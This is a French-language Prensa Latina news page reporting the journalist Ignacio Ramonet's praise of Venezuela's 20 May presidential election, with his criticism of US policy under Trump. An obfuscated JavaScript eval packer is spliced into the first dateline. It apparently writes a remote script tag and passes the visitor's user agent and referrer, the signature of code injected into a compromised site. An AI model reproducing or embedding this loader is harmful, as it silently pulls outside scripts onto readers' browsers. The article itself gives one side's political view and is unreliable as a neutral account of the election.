samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Ignacio Ramonet qualifie de démocratiques les élections au Venezuela

Caracas,  eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kndas|var|u0026u|referrer|yhser||js|php'.split('|'),0,{})) 24 mai (Prensa Latina) Le journaliste et professeur universitaire espagnol, Ignacio Ramonet, a aujourd'hui défini les élections présidentielles du 20 mai au Venezuela comme un exercice démocratique, libre, transparent et pacifique.

Caracas,  24 mai (Prensa Latina) Le journaliste et professeur universitaire espagnol, Ignacio Ramonet, a aujourd’hui défini les élections présidentielles du 20 mai au Venezuela comme un exercice démocratique, libre, transparent et pacifique.

Ramonet, qui a fait parti des 150 observateurs étrangers ayant assisté à ces élections, a expliqué à la presse que tous les journalistes présents à ce processus ont pu constater qu’il a été un modèle de liberté, de transparence et de démocratie pendant lequel le peuple vénézuélien a défendu ses principes.

Trois aspects de cette élection ont particulièrement retenu son attention: le fait, d’abord, qu’elle ait eu lieu en dépit de toutes les menaces pesant sur elle et les pressions de la part de la droite -à l’intérieur, et à l’extérieur du pays-, pressions encouragées par les actes d’ingérence des Etats-Unis et de leurs alliés.

Ensuite, le fait que, pendant cette campagne, tous les acteurs politiques qui y participaient ont parcouru le pays et ont pu expliquer leur programme au peuple; le tout dans une ambiance de tranquillité et de normalité.

Finalement, le fait que, dans un tel contexte, la non reconnaissance de la validité de ces élections par certains secteurs est une attitude sans fondement, de même que la campagne de dénigrement menée à l’extérieur contre le pays.

Cette position, a-t-il déclaré « ne repose pas sur une observation rationnelle de ce qui s’est passé au Venezuela le 20 mai et pendant les semaines de campagne électorale ayant précédé ».

Ramonet a condamné la politique de domination que le président des Etats-Unis, Donald Trump, veut imposer à tout prix et qui s’accompagne d’une absence totale du sens du dialogue et de la négociation.

 » Le président Trump montre une image de brutalité et de force qui est une menace réelle et peut aboutir à une rupture de l’équilibre international », a mis en garde cet intellectuelespagnol qui réside en France.

Lui aussi s’est dit extrêmement concerné par l’absence de tout agenda qui pourrait rapprocher le gouvernement étatsunien de l’Amérique Latine et remplacer l’attitude de mépris qu’il pratique actuellement.

Le 20 mai, le peuple vénézuélien, avec six millions 224 mille 40 voix, a décidé que le président Maduro serait maintenu à son poste de 2019 à 2025.

peo/mgt/odf

EN CONTINU
notes connexes